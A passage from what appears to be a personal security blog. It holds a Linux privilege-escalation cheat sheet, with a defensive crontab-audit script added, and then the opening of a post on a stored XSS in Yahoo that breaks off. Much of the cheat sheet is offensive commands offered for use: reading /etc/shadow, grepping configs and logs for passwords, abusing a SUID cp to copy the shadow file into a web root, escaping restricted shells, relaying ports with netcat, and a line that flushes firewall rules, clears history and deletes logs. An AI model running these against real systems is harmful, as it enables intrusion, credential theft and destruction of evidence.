courier; font-size: medium;"><b>## Which configuration files can be written in /etc/? 
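</b></span></p><p><span style="font-family: courier; font-size: medium;">The cron and /etc checks above boil down to one question: does any job that root runs on a schedule point at a file, or sit in a directory, that an unprivileged user can change? The "ls -aRl ... | awk" lines answer it by eye; the script below answers it mechanically. It is an added example written for this post, not part of the original cheat sheet: it parses a system-format crontab, takes the executable from each job line and checks its mode bits with find (so the answer is the same whether you run it as root or not, unlike test -w). The crontab, scripts and directory layout it audits are constructed in a temporary directory; their names are assumptions for the demo.</span></p>

```shell
#!/bin/sh
# Added example (not from the original post): instead of eyeballing
# "ls -la /etc/cron*", parse a system crontab and flag every job whose
# executable, or the directory holding it, is writable by everyone.
# A job like that, run by root from cron, is a privilege-escalation path.
# The crontab and scripts below are constructed inside a temporary directory.
set -eu

# Print the executable of each job in a system-format crontab ($1):
#   min hour dom mon dow user command...      -> field 7
#   @reboot user command...                   -> field 3
# Comments, blank lines and VAR=value assignments are skipped.
cron_commands() {
    awk '
        /^[ \t]*#/ { next }
        NF == 0    { next }
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        /^[ \t]*@/ { print $3; next }
        { print $7 }
    ' "$1"
}

# Mode-based checks (find on the path itself), so they give the same answer
# whether the audit runs as root or as an unprivileged user, unlike "test -w".
world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]
}
world_writable_dir_no_sticky() {
    [ -n "$(find "$1" -maxdepth 0 -type d -perm -0002 ! -perm -1000 2>/dev/null)" ]
}

# Print one line per hijackable job: WRITABLE-FILE if the script itself can be
# edited, WRITABLE-DIR if it can be replaced (directory writable, no sticky bit).
# Relative commands (cd, run-parts, ...) depend on PATH and are not resolved here.
audit_crontab() {
    cron_commands "$1" | while IFS= read -r cmd; do
        case $cmd in /*) ;; *) continue ;; esac
        if world_writable "$cmd"; then
            echo "WRITABLE-FILE $cmd"
        elif world_writable_dir_no_sticky "$(dirname "$cmd")"; then
            echo "WRITABLE-DIR  $cmd"
        fi
    done
}

# Build a constructed lab under $1 (names are demo assumptions): one
# world-writable script, one sane script, one sane script sitting in a
# world-writable directory, plus a crontab that runs all three as root.
make_cron_lab() {
    lab_root=$1
    mkdir -p "$lab_root/opt/backup" "$lab_root/usr/local/bin" "$lab_root/scratch"
    chmod 0755 "$lab_root/opt" "$lab_root/opt/backup" "$lab_root/usr" "$lab_root/usr/local" "$lab_root/usr/local/bin"
    printf '#!/bin/sh\necho backup\n' > "$lab_root/opt/backup/run.sh";    chmod 0777 "$lab_root/opt/backup/run.sh"
    printf '#!/bin/sh\necho rotate\n' > "$lab_root/usr/local/bin/rotate"; chmod 0755 "$lab_root/usr/local/bin/rotate"
    printf '#!/bin/sh\necho clean\n'  > "$lab_root/scratch/clean.sh";     chmod 0755 "$lab_root/scratch/clean.sh"
    chmod 0777 "$lab_root/scratch"
    cat > "$lab_root/crontab" <<EOF
# constructed /etc/crontab for the demo
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root $lab_root/opt/backup/run.sh >/dev/null 2>&1
0 3 * * * root $lab_root/usr/local/bin/rotate --weekly
@reboot root $lab_root/scratch/clean.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
}

# Stand-alone demo: run.sh (writable file) and clean.sh (writable directory)
# are flagged; rotate is clean and the run-parts job has a relative command.
lab=$(mktemp -d)
make_cron_lab "$lab"
audit_crontab "$lab/crontab"
rm -rf "$lab"
```

<p><span style="font-family: courier; font-size: medium;">On a real target, point audit_crontab at /etc/crontab and at each file under /etc/cron.d; jobs with relative commands (run-parts, cd) still need a PATH-based check by hand, and the same directory test applies to /etc/cron.hourly and friends themselves.</span></p><p><span style="font-family: courier; font-size: medium;"><b>## Which configuration files can be written in /etc/? 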
Able to reconfigure a service?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -readable -type f 2>/dev/null # Readable by the current user</span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -maxdepth 1 -readable -type f 2>/dev/null # As above, top level only</span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -writable -type f 2>/dev/null # Writable by the current user</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -writable -type d 2>/dev/null # folders writable by the current user</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -222 -type d 2>/dev/null # folders writable by owner, group and others</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+w -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+x -type d 2>/dev/null # world-executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writable & executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Any "problem" files? World-writable files, files without an owner</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null # world-writable directories without the sticky bit (anyone can replace files in them)</span></p><p><span style="font-family: courier; font-size: medium;">find / -xdev -type f -perm -0002 -print 2>/dev/null # world-writable files</span></p><p><span style="font-family: courier; font-size: medium;">find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null # files with no owner or no group</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What sensitive files can be found? 
</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/passwd</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/group</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/shadow</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/mail/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Anything "interesting" in the home directories, if they can be accessed?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -ahlR /root/</span></p><p><span style="font-family: courier; font-size: medium;">ls -ahlR /home/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What can be found in /var/ ?</b> </span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/mail</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool/lpd </span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/pgsql</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/mysql</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/lib/dhcp3/dhclient.leases</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Any settings/files (hidden) on the website? 
Any settings file with database information?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alhR /var/www/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /srv/www/htdocs/ </span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /usr/local/www/apache22/data/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /opt/lampp/htdocs/ </span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /var/www/html/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Is there anything in the log file(s)? (Could help with "Local File Includes"!)</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/auth.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/chttp.log</span></p><p><span 
style="font-family: courier; font-size: medium;">cat /var/log/cups/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/dpkg.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/faillog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lastlog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/lighttpd.access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/lighttpd.error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/messages</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/secure</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/syslog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/wtmp</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/xferlog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/yum.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/run/utmp</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/webmin/miniserv.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/www/logs/access_log</span></p><p><span 
style="font-family: courier; font-size: medium;">cat /var/www/logs/access.log</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/dhcp3/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/postgresql/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/proftpd/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/samba/</span></p><p><span style="font-family: courier; font-size: medium;"># auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Search for specific strings inside a file</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">file ./somefile ## file info</span></p><p><span style="font-family: courier; font-size: medium;">strings ./*.txt | grep password</span></p><p><span style="font-family: courier; font-size: medium;">find / -name "*.log" 2>/dev/null | xargs grep -i pass</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">grep -l -i pass /var/log/*.log 2>/dev/null // Check log files for keywords ("pass" in this example) and list the files that match</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 10 -name "*.conf" -type f -exec grep -Hn pass {} \; 2>/dev/null // Search .conf files for the string "pass" and output file name and line number</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 10 -name "*etc*" -type f -exec grep -Hn pass {} \; 2>/dev/null // As above, but in files whose name contains "etc"</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null // Find .conf files (recursive 4 levels) and output the line number where the word password is located</span></p><p><span style="font-family: courier; font-size: medium;">grep -i user [filename]</span></p><p><span style="font-family: courier; font-size: medium;">grep -i pass [filename]</span></p><p><span style="font-family: courier; font-size: medium;">grep -C 5 "password" [filename]</span></p><p><span style="font-family: courier; font-size: medium;">find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Joomla (single quotes so the shell does not expand $password)</span></p><p><span style="font-family: courier; font-size: medium;">hexeditor ./file</span></p><p><span style="font-family: courier; font-size: medium;">objdump -D -M intel ./file</span></p><p><span style="font-family: courier; font-size: medium;">objdump -D -M x86-64 ./file >> dump64.file</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">cat /var/apache2/config.inc</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/lib/mysql/mysql/user.MYD </span></p><p><span style="font-family: courier; font-size: medium;">cat /root/anaconda-ks.cfg</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / -name "network-secret.txt"</span></p><p><span style="font-family: courier; font-size: medium;">locate "network-secret.txt"</span></p><p><span style="font-family: courier; font-size: medium;"> </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Permissions ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What "Advanced Linux File Permissions" are used? 
Sticky bits, SUID & SGID</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -perm -u=s -type f 2>/dev/null # Find FILES that have the SUID bit set (often mislabelled as the sticky bit; the real sticky bit is -perm -1000 below). </span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -1000 -type d 2>/dev/null # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (the parentheses matter: -o binds weaker than the implied -a, so without them -type f only applies to the SUID half)</span></p><p><span style="font-family: courier; font-size: medium;">for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null # -maxdepth goes before the tests; the parentheses make ! -type l and -exec apply to both halves</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Where can files be written to and executed from? 
A few 'common' places: /tmp, /var/tmp, /dev/shm</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -writable -type d 2>/dev/null # folders writable by the current user (not necessarily world-writable)</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -222 -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+w -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+x -type d 2>/dev/null # world-executable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writable & executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># Any "problem" files? World-writable, "nobody" files</span></p><p><span style="font-family: courier; font-size: medium;">find / -xdev -type d \( -perm -0002 -a ! 
-perm -1000 \) -print # world-writable directories without the sticky bit</span></p><p><span style="font-family: courier; font-size: medium;">find /dir -xdev \( -nouser -o -nogroup \) -print # files with no owner or group (-nouser / -nogroup)</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># Example:</span></p><p><span style="font-family: courier; font-size: medium;">## We found cp (copy) in the above list and now we are abusing it:</span></p><p><span style="font-family: courier; font-size: medium;">cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">## A few things to keep in mind:</span></p><p><span style="font-family: courier; font-size: medium;">## (1) at the destination, the file owner will be root but the group will be that of the current user, and </span></p><p><span style="font-family: courier; font-size: medium;">## (2) notice the use of "--no-preserve": this is needed to read out protected files.</span></p><p><span style="font-family: courier; font-size: medium;">## A lot of ways we can abuse this: update the shadow file with a new account, modify sudoers, plant an ssh key + modify sshd_config + reboot, or cron.hourly.</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== File system ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">df -ah // all FS info, including pseudo, duplicate, INACCESSIBLE file systems</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Are there any unmounted file-systems?</b></span></p><pre><code><p><span style="font-family: 
courier; font-size: medium;">cat /etc/fstab</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Networking, Routing & Communications ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">/sbin/ifconfig -a // List all network interfaces</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/network/interfaces // As above</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sysconfig/network </span></p><p><span style="font-family: courier; font-size: medium;">arp -a // Display the ARP cache</span></p><p><span style="font-family: courier; font-size: medium;">route // Display route information</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/resolv.conf // Show configured DNS server addresses</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antp // List all TCP sockets and related PIDs (-p Privileged command)</span></p><p><span style="font-family: courier; font-size: medium;">netstat -anup // List all UDP sockets and related PIDs (-p Privileged command)</span></p><p><span style="font-family: courier; font-size: medium;">iptables -L // List rules - Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/services // View port number/service mappings</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? 
===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/resolv.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sysconfig/network</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/networks</span></p><p><span style="font-family: courier; font-size: medium;">iptables -L</span></p><p><span style="font-family: courier; font-size: medium;">hostname</span></p><p><span style="font-family: courier; font-size: medium;">dnsdomainname</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Common Shell Escape Sequences ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b>## If commands are limited, can you break out of the "jail" shell?</b></span></p><p><span style="font-family: courier; font-size: medium;">python -c 'import pty;pty.spawn("/bin/bash")'</span></p><p><span style="font-family: courier; font-size: medium;">echo os.system('/bin/bash')</span></p><p><span style="font-family: courier; font-size: medium;">/bin/sh -i</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">:!bash vi, vim</span></p><p><span style="font-family: courier; font-size: medium;">:set shell=/bin/bash</span><span style="font-family: courier; font-size: medium;"> :shell vi, vim</span></p><p><span style="font-family: courier; font-size: medium;">!bash man, more, less</span></p><p><span style="font-family: courier; font-size: medium;">find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find</span></p><p><span style="font-family: courier; font-size: medium;">awk 'BEGIN {system("/bin/bash")}' awk</span></p><p><span style="font-family: courier; font-size: medium;">--interactive nmap</span></p><p><span 
style="font-family: courier; font-size: medium;">perl -e 'exec "/bin/bash";' Perl </span></p><p><span style="font-family: courier; font-size: medium;"> </span></p><p><span style="font-family: courier; font-size: medium;"> </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What other users & hosts are communicating with the system? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">lsof -i </span></p><p><span style="font-family: courier; font-size: medium;">lsof -i :80</span></p><p><span style="font-family: courier; font-size: medium;">grep 80 /etc/services</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antup</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antpx</span></p><p><span style="font-family: courier; font-size: medium;">netstat -tulpn</span></p><p><span style="font-family: courier; font-size: medium;">chkconfig --list</span></p><p><span style="font-family: courier; font-size: medium;">chkconfig --list | grep 3:on</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What's cached? IP and/or MAC addresses ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">arp -e</span></p><p><span style="font-family: courier; font-size: medium;">route</span></p><p><span style="font-family: courier; font-size: medium;">/sbin/route -nee</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Is packet sniffing possible? What can be seen? 
Listen to live traffic ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"># tcpdump 'tcp and dst host [ip] and dst port [port]' (options such as -n and -w must come before the filter expression)</span></p><p><span style="font-family: courier; font-size: medium;">tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.2.2.222 and dst port 21))'</span></p><p><span style="font-family: courier; font-size: medium;">tcpdump -n -vvv -w file.cap dst host 192.168.1.5</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b> === Is port forwarding possible? Redirect and interact with traffic from another view ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b># rinetd</b></span></p><p><span style="font-family: courier; font-size: medium;">http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># fpipe</span></p><p><span style="font-family: courier; font-size: medium;">FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]</span></p><p><span style="font-family: courier; font-size: medium;">FPipe.exe -l 80 -r 80 -s 80 192.168.1.7</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]</span></p><p><span style="font-family: courier; font-size: medium;">ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port</span></p><p><span style="font-family: courier; font-size: medium;">ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe</span></p><p><span style="font-family: courier; font-size: medium;">mknod 
backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay</span></p><p><span style="font-family: courier; font-size: medium;">mknod backpipe p ; nc -l -p 8080 0&lt;backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)</span></p><p><span style="font-family: courier; font-size: medium;">mknod backpipe p ; nc -l -p 8080 0&lt;backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Is tunneling possible? Send commands locally, remotely</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ssh -D 127.0.0.1:9050 -N [username]@[ip] </span></p><p><span style="font-family: courier; font-size: medium;">proxychains ifconfig</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#copy bash to a new subshell</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"># mount an NFS share from a remote server, copy bash from local to remote and execute</span></p><p><span style="font-family: courier; font-size: medium;">cp -p ./bash /mnt/share/newbash</span></p><p><span style="font-family: courier; font-size: medium;">./newbash -p</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Preparation & Finding Exploit Code ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What development tools/languages are installed/supported?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -name 'perl*'</span></p><p><span style="font-family: courier; font-size: medium;">find / -name 'python*'</span></p><p><span style="font-family: courier; font-size: medium;">find / 
-name 'gcc*' </span></p><p><span style="font-family: courier; font-size: medium;">find / -name cc</span></p><p><br /></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## How can files be uploaded?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -name wget</span></p><p><span style="font-family: courier; font-size: medium;">find / -name 'nc*'</span></p><p><span style="font-family: courier; font-size: medium;">find / -name 'netcat*'</span></p><p><span style="font-family: courier; font-size: medium;">find / -name 'tftp*' </span></p><p><span style="font-family: courier; font-size: medium;">find / -name ftp </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#copy files with SSH</b></span></p><pre><code><div style="text-align: left;"><span style="font-family: courier; font-size: medium;">scp username@b:/path/to/file /path/to/destination // while being logged into A</span></div><p><span style="font-family: courier; font-size: medium;">scp /path/to/file username@a:/path/to/destination // while being logged into B</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#compile C with gcc</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">gcc ./ajaira_exploit.c -o exploit</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#clear history, iptables and logs</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">iptables -F; history -c; find ./ -name "*.log" | xargs rm -f</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b># Postfix version</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">postconf -d | grep mail_vers</span></p><p><span style="font-family: courier; font-size: medium;"><br 
/></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>./Will_be_continue | everything is collected</b></span></p>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-44893061464991453702018-08-12T23:38:00.002+06:002021-01-24T16:38:44.716+06:00Stored XSS in Yahoo!<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="graf graf--p graf-after--h3" id="a17c" name="a17c" style="--baseline-multiplier: 0.17; background-color: white; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 10px;">
<div style="text-align: center;">
<br /><b><span style="font-family: courier; font-size: medium;">
Sharing is Caring :)</span></b></div>
<div style="text-align: center;"><b><span style="font-family: courier; font-size: medium;">
When we share, we open doors to a new beginning...../</span></b></div>
</div>
<div class="graf graf--p graf-after--p" id="0428" name="0428" style="--baseline-multiplier: 0.17; background-color: white; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Well, <span style="letter-spacing: -0.003em;">now I am going to share how I found Stored Cross-Site Scripting (XSS) in Yahoo.</span></span></div>
</div>
<div>
<div style="text-align: center;">
<span color="rgba(0 , 0 , 0 , 0.84)" style="background-color: white; letter-spacing: -0.015em;"><br /></span></div>
<div style="text-align: center;">
<span color="rgba(0 , 0 , 0 , 0.84)" style="background-color: white; font-family: courier; font-size: medium; letter-spacing: -0.015em;"><b>Steps to Reproduce:</b></span></div>
</div>
<div>
<div class="graf graf--p graf-after--h3" id="b442" name="b442" style="--baseline-multiplier: 0.17; background-color: white; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<div style="text-align: center;"><b style="color: rgba(0, 0, 0, 0.84);"><span style="font-family: courier; font-size: medium;">
